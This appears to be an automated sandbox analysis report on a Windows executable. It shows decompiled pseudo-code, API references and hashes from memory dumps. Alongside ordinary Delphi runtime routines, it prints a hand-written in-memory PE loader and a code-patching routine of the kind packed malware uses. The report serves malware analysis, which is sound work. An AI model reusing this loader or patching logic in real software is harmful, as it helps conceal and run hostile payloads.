SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 00454C19 CreateFontIndirectA.GDI32(?), ref: 00454C26 GetStockObject.GDI32(0000000D), ref: 00454C3C Part of subcall function 00425C2C: MulDiv.KERNEL32(00000000,?,00000048), ref: 00425C39 SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00454C65 CreateFontIndirectA.GDI32(?), ref: 00454C75 CreateFontIndirectA.GDI32(?), ref: 00454C8E GetStockObject.GDI32(0000000D), ref: 00454CB4

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFontIndirect$InfoObjectParametersStockSystem String ID: API String ID: 2891467149-0 Opcode ID: 3707ccf87d63a4fde2d24c5a51ee6470f37ba181e11017e0d22171a681295a96 Instruction ID: 0f587122efedf7d321ac9ee3614aa9c37689806316be6897d166c53c05cdaab1 Opcode Fuzzy Hash: 3707ccf87d63a4fde2d24c5a51ee6470f37ba181e11017e0d22171a681295a96 Instruction Fuzzy Hash: 3131D6307042109BEB10EB65DC42B9937E4AB84309F4140B7FD48DB29BEA789848872D

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 67%

E03591714(signed int __eax) { signed int __ebx; signed int __edi; signed int __esi; void* _t96; void** _t99; signed int _t104; signed int _t109; signed int _t110; intOrPtr* _t114; void* _t116; void* _t121; signed int _t125; signed int _t129; signed int _t131; signed int _t132; signed int _t133; signed int _t134; signed int _t135; unsigned int _t141; signed int _t142; void* _t144; void* _t147; intOrPtr _t148; signed int _t150; long _t156; intOrPtr _t159; signed int _t162; _t129 = *0x35aa045; // 0x0 if(__eax > 0xa2c) { __eflags = __eax - 0x40a2c; if(__eax > 0x40a2c) { _pop(_t120); __eflags = __eax; if(__eax >= 0) { _push(_t120); _t162 = __eax; _t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000; _t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed _t121 = _t96; if(_t121 != 0) { _t147 = _t121; *((intOrPtr*)(_t147 + 8)) = _t162; *(_t147 + 0xc) = _t156 | 0x00000004; L03591634(); _t99 = *0x35ac7a8; // 0x7f9d0000 *_t147 = 0x35ac7a4; *0x35ac7a8 = _t121; *(_t147 + 4) = _t99; *_t99 = _t121; *0x35ac7a0 = 0; _t121 = _t121 + 0x10; } return _t121; } else { __eflags = 0; return 0; } } else { _t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30; __eflags = _t129; if(__eflags != 0) { while(1) { asm("lock cmpxchg [0x35aa710], ah"); if(__eflags == 0) { goto L39; } Sleep(0); asm("lock cmpxchg [0x35aa710], ah"); if(__eflags != 0) { Sleep(0xa); continue; } goto L39; } } L39: _t141 = _t125 - 0xb30; _t142 = _t141 >> 0xd; _t131 = _t141 >> 8; _t104 = 0xffffffff << _t131 & *(0x35aa720 + _t142 * 4); __eflags = 0xffffffff; if(0xffffffff == 0) { _t132 = _t142; __eflags = 0xfffffffe << _t132 & *0x35aa71c; if((0xfffffffe << _t132 & *0x35aa71c) == 0) { _t133 = *0x35aa718; // 0xee390 _t134 = _t133 - _t125; __eflags = _t134; if(_t134 < 0) { _t109 = E035915BC(_t125); } else { _t110 = *0x35aa714; // 0x380e3a0 _t109 = _t110 - _t125; *0x35aa714 = _t109; *0x35aa718 = _t134; *(_t109 - 4) = _t125 | 0x00000002; } *0x35aa710 = 0; return _t109; } else { asm("bsf edx, eax"); asm("bsf ecx, eax"); _t135 = _t132 | _t142 << 0x00000005; goto L47; } } else { asm("bsf eax, eax"); _t135 = _t131 & 0xffffffe0 | _t104; L47: _push(_t152); _push(_t145); _t148 = 0x35aa7a0 + _t135 * 8; _t159 = *((intOrPtr*)(_t148 + 4)); _t114 = *((intOrPtr*)(_t159 + 4)); *((intOrPtr*)(_t148 + 4)) = _t114; *_t114 = _t148; __eflags = _t148 - _t114; if(_t148 == _t114) { asm("rol eax, cl"); _t80 = 0x35aa720 + _t142 * 4; *_t80 = *(0x35aa720 + _t142 * 4) & 0xfffffffe; __eflags = *_t80; if( *_t80 == 0) { asm("btr [0x35aa71c], edx"); } } _t150 = 0xfffffff0 & *(_t159 - 4); _t144 = 0xfffffff0 - _t125; __eflags = 0xfffffff0; if(0xfffffff0 == 0) { _t89 = &((_t159 - 4)[0xfffffffffffffffc]); *_t89 = *(_t159 - 4 + _t150) & 0x000000f7; __eflags = *_t89; } else { _t116 = _t125 + _t159; *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3; *(0xfffffff0 + _t116 - 8) = 0xfffffff0; __eflags = 0xfffffff0 - 0xb30; if(0xfffffff0 >= 0xb30) { L035914F0(_t116, 0xfffffffffffffff3, _t144); } } *(_t159 - 4) = _t125 + 2; *0x35aa710 = 0; return _t159; } } } else { __eflags = __cl; __eax = *(__edx + 0x35aa5b8) & 0x000000ff; __ebx = 0x35a8040 + ( *(__edx + 0x35aa5b8) & 0x000000ff) * 8; if(__eflags != 0) { while(1) { __eax = 0x100; asm("lock cmpxchg [ebx], ah"); if(__eflags == 0) { goto L5; } __ebx = __ebx + 0x20; __eflags = __ebx; __eax = 0x100; asm("lock cmpxchg [ebx], ah"); if(__ebx != 0) { __ebx = __ebx + 0x20; __eflags = __ebx; __eax = 0x100; asm("lock cmpxchg [ebx], ah"); if(__ebx != 0) { __ebx = __ebx - 0x40; __eflags = __ebx; Sleep(0); __eax = 0x100; asm("lock cmpxchg [ebx], ah"); if(__eflags != 0) { Sleep(0xa); continue; } } } goto L5; } } L5: __edx = *(__ebx + 4); __eax = *(__edx + 8); __ecx = 0xfffffff8; __eflags = __edx - __ebx; if(__edx == __ebx) { __edx = *(__ebx + 0x10); __ecx = *(__ebx + 2) & 0x0000ffff; __ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax; __eflags = __eax - *(__ebx + 0xc); if(__eax > *(__ebx + 0xc)) { _push(__esi); _push(__edi); __eflags = *0x35aa045; if(__eflags != 0) { while(1) { __eax = 0x100; asm("lock cmpxchg [0x35aa710], ah"); if(__eflags == 0) { goto L20; } Sleep(0); __eax = 0x100; asm("lock cmpxchg [0x35aa710], ah"); if(__eflags != 0) { Sleep(0xa); continue; } goto L20; } } L20: *(__ebx + 1) = *(__ebx + 1) & *0x35aa71c; __eflags = *(__ebx + 1) & *0x35aa71c; if(( *(__ebx + 1) & *0x35aa71c) == 0) { __ecx = *(__ebx + 0x18) & 0x0000ffff; __edi = *0x35aa718; // 0xee390 __eflags = __edi - ( *(__ebx + 0x18) & 0x0000ffff); if(__edi < ( *(__ebx + 0x18) & 0x0000ffff)) { __eax = *(__ebx + 0x1a) & 0x0000ffff; __edi = __eax; __eax = E035915BC(__eax); __esi = __eax; __eflags = __eax; if(__eax != 0) { goto L33; } else { *0x35aa710 = __al; *__ebx = __al; _pop(__edi); _pop(__esi); _pop(__ebx); return __eax; } } else { __esi = *0x35aa714; // 0x380e3a0 __ecx = *(__ebx + 0x1a) & 0x0000ffff; __edx = __ecx + 0xb30; __eflags = __edi - __ecx + 0xb30; if(__edi >= __ecx + 0xb30) { __edi = __ecx; } __esi = __esi - __edi; *0x35aa718 = *0x35aa718 - __edi; *0x35aa714 = __esi; goto L33; } } else { asm("bsf eax, esi"); __esi = __eax * 8; __ecx = *(0x35aa720 + __eax * 4); asm("bsf ecx, ecx"); __ecx = *(0x35aa720 + __eax * 4) + __eax * 8 * 4; __edi = 0x35aa7a0 + ( *(0x35aa720 + __eax * 4) + __eax * 8 * 4) * 8; __esi = *(__edi + 4); __edx = *(__esi + 4); *(__edi + 4) = __edx; *__edx = __edi; __eflags = __edi - __edx; if(__edi == __edx) { __edx = 0xfffffffe; asm("rol edx, cl"); _t38 = 0x35aa720 + __eax * 4; *_t38 = *(0x35aa720 + __eax * 4) & 0xfffffffe; __eflags = *_t38; if( *_t38 == 0) { asm("btr [0x35aa71c], eax"); } } __edi = 0xfffffff0; __edi = 0xfffffff0 & *(__esi - 4); __eflags = 0xfffffff0 - 0x10a60; if(0xfffffff0 < 0x10a60) { _t52 = &((__esi - 4)[0xfffffffffffffffc]); *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7; __eflags = *_t52; } else { __edx = __edi; __edi = *(__ebx + 0x1a) & 0x0000ffff; __edx = __edx - __edi; __eax = __edi + __esi; __ecx = __edx + 3; *(__eax - 4) = __ecx; *(__edx + __eax - 8) = __edx; __eax = L035914F0(__eax, __ecx, __edx); } L33: _t56 = __edi + 6; // 0xee396 __ecx = _t56; *(__esi - 4) = _t56; __eax = 0; *0x35aa710 = __al; *__esi = __ebx; *((intOrPtr*)(__esi + 8)) = 0; *((intOrPtr*)(__esi + 0xc)) = 1; *(__ebx + 0x10) = __esi; _t61 = __esi + 0x20; // 0x380e3c0 __eax = _t61; __ecx = *(__ebx + 2) & 0x0000ffff; __edx = __ecx + __eax; *(__ebx + 8) = __ecx + __eax; __edi = __edi + __esi; __edi = __edi - __ecx; __eflags = __edi; *(__ebx + 0xc) = __edi; *__ebx = 0; *(__eax - 4) = __esi; _pop(__edi); _pop(__esi); _pop(__ebx); return __eax; } } else { _t19 = __edx + 0xc; *_t19 = *(__edx + 0xc) + 1; __eflags = *_t19; *(__ebx + 8) = __ecx; *__ebx = 0; *(__eax - 4) = __edx; _pop(__ebx); return __eax; } } else { *(__edx + 0xc) = *(__edx + 0xc) + 1; __ecx = 0xfffffff8 & *(__eax - 4); __eflags = 0xfffffff8; *(__edx + 8) = 0xfffffff8 & *(__eax - 4); *(__eax - 4) = __edx; if(0xfffffff8 == 0) { __ecx = *(__edx + 4); *(__ecx + 0x14) = __ebx; *(__ebx + 4) = __ecx; *__ebx = 0; _pop(__ebx); return __eax; } else { *__ebx = 0; _pop(__ebx); return __eax; } } } } 0x03591720 0x03591726 0x03591958 0x0359195d 0x03591a70 0x03591a71 0x03591a73 0x03591674 0x03591678 0x03591684 0x03591694 0x03591699 0x0359169d 0x0359169f 0x035916a1 0x035916a7 0x035916aa 0x035916af 0x035916b4 0x035916ba 0x035916c0 0x035916c3 0x035916c5 0x035916cc 0x035916cc 0x035916d5 0x03591a79 0x03591a79 0x03591a7b 0x03591a7b 0x03591963 0x0359196f 0x03591972 0x03591974 0x03591928 0x0359192d 0x03591935 0x00000000 0x00000000 0x03591939 0x03591943 0x0359194b 0x0359194f 0x00000000 0x0359194f 0x00000000 0x0359194b 0x03591928 0x03591976 0x03591976 0x0359197e 0x03591981 0x0359198b 0x0359198b 0x03591992 0x035919a5 0x035919a9 0x035919af 0x035919c8 0x035919ce 0x035919ce 0x035919d0 0x035919ee 0x035919d2 0x035919d2 0x035919d7 0x035919d9 0x035919de 0x035919e7 0x035919e7 0x035919f3 0x035919fb 0x035919b1 0x035919b1 0x035919bb 0x035919c3 0x00000000 0x035919c3 0x03591994 0x03591997 0x0359199a 0x035919fc 0x035919fc 0x035919fd 0x035919fe 0x03591a05 0x03591a08 0x03591a0b 0x03591a0e 0x03591a10 0x03591a12 0x03591a19 0x03591a1b 0x03591a1b 0x03591a1b 0x03591a22 0x03591a24 0x03591a24 0x03591a22 0x03591a30 0x03591a35 0x03591a35 0x03591a37 0x03591a58 0x03591a58 0x03591a58 0x03591a39 0x03591a39 0x03591a3f 0x03591a42 0x03591a46 0x03591a4c 0x03591a4e 0x03591a4e 0x03591a4c 0x03591a60 0x03591a63 0x03591a6f 0x03591a6f 0x03591992 0x0359172c 0x0359172c 0x0359172e 0x03591735 0x0359173c 0x03591794 0x03591794 0x03591799 0x0359179d 0x00000000 0x00000000 0x0359179f 0x0359179f 0x035917a2 0x035917a7 0x035917ab 0x035917ad 0x035917ad 0x035917b0 0x035917b5 0x035917b9 0x035917bb 0x035917bb 0x035917c0 0x035917c5 0x035917ca 0x035917ce 0x035917d6 0x00000000 0x035917d6 0x035917ce 0x035917b9 0x00000000 0x035917ab 0x03591794 0x0359173e 0x0359173e 0x03591741 0x03591744 0x03591749 0x0359174b 0x03591764 0x03591767 0x0359176b 0x0359176d 0x03591770 0x035917e0 0x035917e1 0x035917e2 0x035917e9 0x035917eb 0x035917eb 0x035917f0 0x035917f8 0x00000000 0x00000000 0x035917fc 0x03591801 0x03591806 0x0359180e 0x03591812 0x00000000 0x03591812 0x00000000 0x0359180e 0x035917eb 0x0359181c 0x03591820 0x03591820 0x03591826 0x03591898 0x0359189c 0x035918a2 0x035918a4 0x035918cc 0x035918d0 0x035918d2 0x035918d7 0x035918d9 0x035918db 0x00000000 0x035918dd 0x035918dd 0x035918e2 0x035918e4 0x035918e5 0x035918e6 0x035918e7 0x035918e7 0x035918a6 0x035918a6 0x035918ac 0x035918b0 0x035918b6 0x035918b8 0x035918ba 0x035918ba 0x035918bc 0x035918be 0x035918c4 0x00000000 0x035918c4 0x03591828 0x03591828 0x0359182b 0x03591832 0x03591839 0x0359183c 0x0359183f 0x03591846 0x03591849 0x0359184c 0x0359184f 0x03591851 0x03591853 0x03591855 0x0359185a 0x0359185c 0x0359185c 0x0359185c 0x03591863 0x03591865 0x03591865 0x03591863 0x0359186c 0x03591871 0x03591874 0x0359187a 0x035918e8 0x035918e8 0x035918e8 0x0359187c 0x0359187c 0x0359187e 0x03591882 0x03591884 0x03591887 0x0359188a 0x0359188d 0x03591891 0x03591891 0x035918ed 0x035918ed 0x035918ed 0x035918f0 0x035918f3 0x035918f5 0x035918fa 0x035918fc 0x035918ff 0x03591906 0x03591909 0x03591909 0x0359190c 0x03591910 0x03591913 0x03591916 0x03591918 0x03591918 0x0359191a 0x0359191d 0x03591920 0x03591923 0x03591924 0x03591925 0x03591926 0x03591926 0x03591772 0x03591772 0x03591772 0x03591772 0x03591776 0x03591779 0x0359177c 0x0359177f 0x03591780 0x03591780 0x0359174d 0x0359174d 0x03591751 0x03591751 0x03591754 0x03591757 0x0359175a 0x03591784 0x03591787 0x0359178a 0x0359178d 0x03591790 0x03591791 0x0359175c 0x0359175c 0x0359175f 0x03591760 0x03591760 0x0359175a 0x0359174b

APIs

Sleep.KERNEL32(00000000), ref: 035917C0 Sleep.KERNEL32(0000000A,00000000), ref: 035917D6

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: Sleep String ID: API String ID: 3472027048-0 Opcode ID: 44a1e9f48dd0093ec581c85454cf2fb4d56766756986518bdf202d22ce9a8494 Instruction ID: 8c33dbe7cad5b8a44d39ddbc2358a56761746d8c99205b6284381606c691d8e8 Opcode Fuzzy Hash: 44a1e9f48dd0093ec581c85454cf2fb4d56766756986518bdf202d22ce9a8494 Instruction Fuzzy Hash: 79B10772500A628BEF15DF28E584766BBF0FB85311F0882AED4168F3B9D7709646E790

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 74%

E035A4C2C(intOrPtr __eax, void* __ebx, intOrPtr __ecx, void* __edx, long __edi, void* __esi, void* __fp0, intOrPtr _a4) { intOrPtr _v8; intOrPtr _v12; void* _v16; void* _v20; intOrPtr _v24; intOrPtr _v28; long _v32; char _v36; intOrPtr _v40; intOrPtr _v44; void* _v48; signed int _v52; long _v56; char _v60; void* _t116; void* _t121; void* _t134; void* _t150; intOrPtr _t161; void* _t175; signed int _t183; signed int _t184; intOrPtr _t188; intOrPtr _t196; intOrPtr _t202; intOrPtr _t203; signed int _t207; signed int _t208; void* _t211; void* _t214; _t206 = __edi; _t213 = _t214; _push(__edi); _v44 = __ecx; _t182 = __edx; _v40 = __eax; _t196 = *0x35a40a8; // 0x35a40ac E03594D4C( &_v36, _t196); _push(_t214); _push(0x35a4e1a); _push( *[fs:eax]); *[fs:eax] = _t214 + 0xffffffc8; _v8 = *((intOrPtr*)(_v44 + 0x3c)) + _v44; _t116 = VirtualAlloc(__edx, *(_v8 + 0x50), 0x2000, 1); // executed _v16 = _t116; _v12 = _v16 - *((intOrPtr*)(_v8 + 0x34)); _t121 = VirtualAlloc(_v16, *(_v8 + 0x54), 0x1000, 4); // executed _v48 = _t121; E03592D7C(_v44, _t182, *(_v8 + 0x54), _v48); VirtualProtect(_v48, *(_v8 + 0x54), "true", &_v56); // executed _t28 = _v8 + 0x18; // 0x18 _t211 = _t28 + ( *(_v8 + 0x14) & 0x0000ffff); _t134 = ( *(_v8 + 6) & 0x0000ffff) - 1; if(_t134 >= 0) { _v60 = _t134 + 1; _t184 = 0; do { _t206 = *(_t211 + 8 + (_t184 + _t184 * 4) * 8); _v52 = *((intOrPtr*)(_t211 + 0x10 + (_t184 + _t184 * 4) * 8)); if(_t206 < _v52) { _t208 = _t206 ^ _v52; _v52 = _v52 ^ _t208; _t206 = _t208 ^ _v52; } _t175 = VirtualAlloc( *((intOrPtr*)(_t211 + 0xc + (_t184 + _t184 * 4) * 8)) + _v16, _t206, 0x1000, 4); // executed _v48 = _t175; E03593108(_v48, _t206); E03592D7C( *((intOrPtr*)(_t211 + 0x14 + (_t184 + _t184 * 4) * 8)) + _v44, _t184, _v52, _v48); _t184 = _t184 + 1; _t66 = &_v60; *_t66 = _v60 - 1; } while ( *_t66 != 0); } _v24 = *((intOrPtr*)(_v8 + 0x28)) + _v16; _v28 = _v24; _v36 = _v16; _v32 = *(_v8 + 0x50); _push(0); L0359547C(); _t145 = *((intOrPtr*)(_v8 + 0xa0)); if( *((intOrPtr*)(_v8 + 0xa0)) != 0) { E035A4A50(_t145 + _v16, _t213); } _t147 = *((intOrPtr*)(_v8 + 0x80)); if( *((intOrPtr*)(_v8 + 0x80)) != 0) { E035A4AD0(_t147 + _v16, _t182, _t206, _t211, _t213); } _t150 = ( *(_v8 + 6) & 0x0000ffff) - 1; if(_t150 >= 0) { _v60 = _t150 + 1; _t183 = 0; do { _push( &_v56); _t207 = _t183 + _t183 * 4; _push(E035A4220( *((intOrPtr*)(_t211 + 0x24 + _t207 * 8)))); _push( *((intOrPtr*)(_t211 + 8 + _t207 * 8))); _t161 = *((intOrPtr*)(_t211 + 0xc + _t207 * 8)); VirtualProtect(_t161 + _v16, ??, ??, ??); // executed _t183 = _t183 + 1; _t102 = &_v60; *_t102 = _v60 - 1; } while ( *_t102 != 0); } _t188 = *0x35a40a8; // 0x35a40ac E03595074(_a4, _t188, &_v36); _pop(_t202); *[fs:eax] = _t202; _push(E035A4E21); _t203 = *0x35a40a8; // 0x35a40ac return E03594E10( &_v36, _t203); } 0x035a4c2c 0x035a4c2d 0x035a4c34 0x035a4c35 0x035a4c38 0x035a4c3a 0x035a4c40 0x035a4c46 0x035a4c4d 0x035a4c4e 0x035a4c53 0x035a4c56 0x035a4c62 0x035a4c74 0x035a4c79 0x035a4c85 0x035a4c9a 0x035a4c9f 0x035a4cae 0x035a4cc4 0x035a4ccc 0x035a4cd6 0x035a4cdf 0x035a4ce2 0x035a4ce5 0x035a4ce8 0x035a4cea 0x035a4ced 0x035a4cf8 0x035a4cfe 0x035a4d00 0x035a4d03 0x035a4d06 0x035a4d06 0x035a4d1c 0x035a4d21 0x035a4d2b 0x035a4d40 0x035a4d45 0x035a4d46 0x035a4d46 0x035a4d46 0x035a4cea 0x035a4d54 0x035a4d5a 0x035a4d60 0x035a4d69 0x035a4d6c 0x035a4d7c 0x035a4d87 0x035a4d8f 0x035a4d95 0x035a4d9a 0x035a4d9e 0x035a4da6 0x035a4dac 0x035a4db1 0x035a4db9 0x035a4dbc 0x035a4dbf 0x035a4dc2 0x035a4dc4 0x035a4dc7 0x035a4dc8 0x035a4dd4 0x035a4dd9 0x035a4dda 0x035a4de2 0x035a4de7 0x035a4de8 0x035a4de8 0x035a4de8 0x035a4dc4 0x035a4df3 0x035a4df9 0x035a4e00 0x035a4e03 0x035a4e06 0x035a4e0e 0x035a4e19

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,00000000,035A4E1A,?,?,71F80000,00000000), ref: 035A4C74 VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00002000,00000001,00000000,035A4E1A,?,?,71F80000,00000000), ref: 035A4C9A VirtualProtect.KERNEL32(?,?,?,?,?,?,00001000,00000004,00000000,?,00002000,00000001,00000000,035A4E1A,?,?), ref: 035A4CC4 VirtualAlloc.KERNEL32(?,035A4839,00001000,00000004,?,?,?,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 035A4D1C VirtualProtect.KERNEL32(?,?,00000000,?,00000000), ref: 035A4DE2

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

API ID: Virtual$Alloc$Protect String ID: API String ID: 655996629-0 Opcode ID: c6136ba8eeb4dcdab8928a1478d342c3ca41cf2cb757f2b6a11f876e00df3c54 Instruction ID: 992d2c816667ef5df58715b186c9753157f42d1eb841d8de2b0a85684d670fe8 Opcode Fuzzy Hash: c6136ba8eeb4dcdab8928a1478d342c3ca41cf2cb757f2b6a11f876e00df3c54 Instruction Fuzzy Hash: A271D4B9A00609EFDB00DFA9E980EAEB7F8FF48310F154065E905EB365D770EA459B50

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 65%

E0042AD08(void* __ebx, void* __esi) { char _v8; intOrPtr _v12; int _t12; intOrPtr* _t15; void* _t22; void* _t33; intOrPtr _t40; void* _t43; void* _t45; void* _t46; intOrPtr _t47; _t43 = __esi; _t33 = __ebx; _t45 = _t46; _t47 = _t46 + 0xfffffef8; _v8 = 0; _push(_t45); _push(0x42ae0b); _push( *[fs:eax]); *[fs:eax] = _t47; _t12 = *0x466354; // 0x60 *0x461c30 = ~(MulDiv(8, _t12, 0x48)); _t15 = *0x462f2c; // 0x4617c0 if( *_t15 == 1 && E0042ACC4() == 0x80) { E004047D4( &_v8, "Tahoma"); } _v12 = E00423918(1); _push(_t45); _push(0x42adc3); _push( *[fs:eax]); *[fs:eax] = _t47; E004239B8(_v12, 0x80000002); _t22 = E00423A1C(_v12, _t33, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes", _t43); // executed _t50 = _t22; if(_t22 != 0) { E00423C4C(_v12, &_v8, "MS Shell Dlg 2", _t50); E00423988(_v12); } _pop(_t40); *[fs:eax] = _t40; _push(0x42adca); return E00403928(_v12); } 0x0042ad08 0x0042ad08 0x0042ad09 0x0042ad0b 0x0042ad13 0x0042ad18 0x0042ad19 0x0042ad1e 0x0042ad21 0x0042ad26 0x0042ad35 0x0042ad3a 0x0042ad42 0x0042ad55 0x0042ad55 0x0042ad66 0x0042ad6b 0x0042ad6c 0x0042ad71 0x0042ad74 0x0042ad7f 0x0042ad8c 0x0042ad91 0x0042ad93 0x0042ada0 0x0042ada8 0x0042ada8 0x0042adaf 0x0042adb2 0x0042adb5 0x0042adc2

APIs

MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0042AD2E Part of subcall function 0042ACC4: GetDC.USER32(00000000), ref: 0042ACCD Part of subcall function 0042ACC4: SelectObject.GDI32(00000000,058A00B4), ref: 0042ACDF Part of subcall function 0042ACC4: GetTextMetricsA.GDI32(00000000), ref: 0042ACEA Part of subcall function 0042ACC4: ReleaseDC.USER32 ref: 0042ACFB

Strings

Tahoma , xrefs: 0042AD50 MS Shell Dlg 2 , xrefs: 0042AD98 SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes , xrefs: 0042AD84

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsObjectReleaseSelectText String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma API String ID: 2013942131-1011973972 Opcode ID: c8202af20d9748dac184fdcebe63c5273684063c3cf8487cfb81228802ca49f1 Instruction ID: 9d3ea1dbbf15434387875305194268bf5b9a98b32bb9e77b65e1f96db536e4fd Opcode Fuzzy Hash: c8202af20d9748dac184fdcebe63c5273684063c3cf8487cfb81228802ca49f1 Instruction Fuzzy Hash: 2211D370700114AFC710DF65E80195D7BB6EB0A304FD14076F800A7BA1DB7D9E22871A

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%

E004217E0(intOrPtr _a4, short _a6, intOrPtr _a8) { struct _WNDCLASSA _v44; struct HINSTANCE__* _t6; CHAR* _t8; struct HINSTANCE__* _t9; int _t10; void* _t11; struct HINSTANCE__* _t13; struct HWND__* _t15; long _t17; struct HINSTANCE__* _t19; CHAR* _t20; struct HWND__* _t22; CHAR* _t24; _t6 = *0x4657f8; // 0x400000 *0x461c04 = _t6; _t8 = *0x461c18; // 0x4217d0 _t9 = *0x4657f8; // 0x400000 _t10 = GetClassInfoA(_t9, _t8, &_v44); asm("sbb eax, eax"); _t11 = _t10 + 1; if(_t11 == 0 || L00406E54 != _v44.lpfnWndProc) { if(_t11 != 0) { _t19 = *0x4657f8; // 0x400000 _t20 = *0x461c18; // 0x4217d0 UnregisterClassA(_t20, _t19); } RegisterClassA(0x461bf4); } _t13 = *0x4657f8; // 0x400000 _t24 = *0x461c18; // 0x4217d0 _t15 = E0040730C(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000); // executed _t22 = _t15; if(_a6 != 0) { _t17 = E00421724(_a4, _a8); // executed SetWindowLongA(_t22, 0xfffffffc, _t17); } return _t22; } 0x004217e7 0x004217ec 0x004217f5 0x004217fb 0x00421801 0x00421809 0x0042180b 0x0042180e 0x0042181c 0x0042181e 0x00421824 0x0042182a 0x0042182a 0x00421834 0x00421834 0x0042184a 0x00421857 0x00421862 0x00421867 0x0042186e 0x00421876 0x0042187f 0x0042187f 0x0042188a

APIs

GetClassInfoA.USER32 ref: 00421801 UnregisterClassA.USER32 ref: 0042182A RegisterClassA.USER32 ref: 00421834 SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0042187F

Memory Dump Source

Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp Download File Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp Download File Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp Download File Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$InfoLongRegisterUnregisterWindow String ID: API String ID: 4025006896-0 Opcode ID: ba9f0a0cd088f042a5653a67c0e6f88016342e97d15f47e505010de3adbd19bf Instruction ID: 027158a3b90695bcfb74c3b3aa95824c4aefdb47031e860d546c877da2bcb83e Opcode Fuzzy Hash: ba9f0a0cd088f042a5653a67c0e6f88016342e97d15f47e505010de3adbd19bf Instruction Fuzzy Hash: 52016171B44105ABCB00FBA9EC81F9A3399E718314F144136F914E73F1EA79A88187AE

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%

E035A4F50(void* __eax, long __ecx, void* __edx) { long _v16; void* __ebx; int _t3; void* _t8; void* _t14; long _t15; DWORD* _t16; _push(__ecx); _t15 = __ecx; _t14 = __edx; _t8 = __eax; _t3 = VirtualProtect(__eax, __ecx, 0x40, _t16); // executed if(_t3 != 0) { E03592D7C(_t14, _t8, _t15, _t8); FlushInstructionCache(GetCurrentProcess(), _t8, _t15); _t3 = VirtualProtect(_t8, _t15, _v16, _t16); // executed } return _t3; } 0x035a4f53 0x035a4f54 0x035a4f56 0x035a4f58 0x035a4f5f 0x035a4f66 0x035a4f6e 0x035a4f7b 0x035a4f88 0x035a4f88 0x035a4f91

APIs

VirtualProtect.KERNEL32(00000000,00000005,00000040,?,00000005,?,?,035A4E54,035A4FB8), ref: 035A4F5F GetCurrentProcess.KERNEL32(00000000,00000005,00000000,00000005,00000040,?,00000005,?,?,035A4E54,035A4FB8), ref: 035A4F75 FlushInstructionCache.KERNEL32(00000000,00000000,00000005,00000000,00000005,00000040,?,00000005,?,?,035A4E54,035A4FB8), ref: 035A4F7B VirtualProtect.KERNEL32(00000000,00000005,035A4FB8,?,00000000,00000000,00000005,00000000,00000005,00000040,?,00000005,?,?,035A4E54,035A4FB8), ref: 035A4F88

Memory Dump Source

Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true

Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File

Similarity

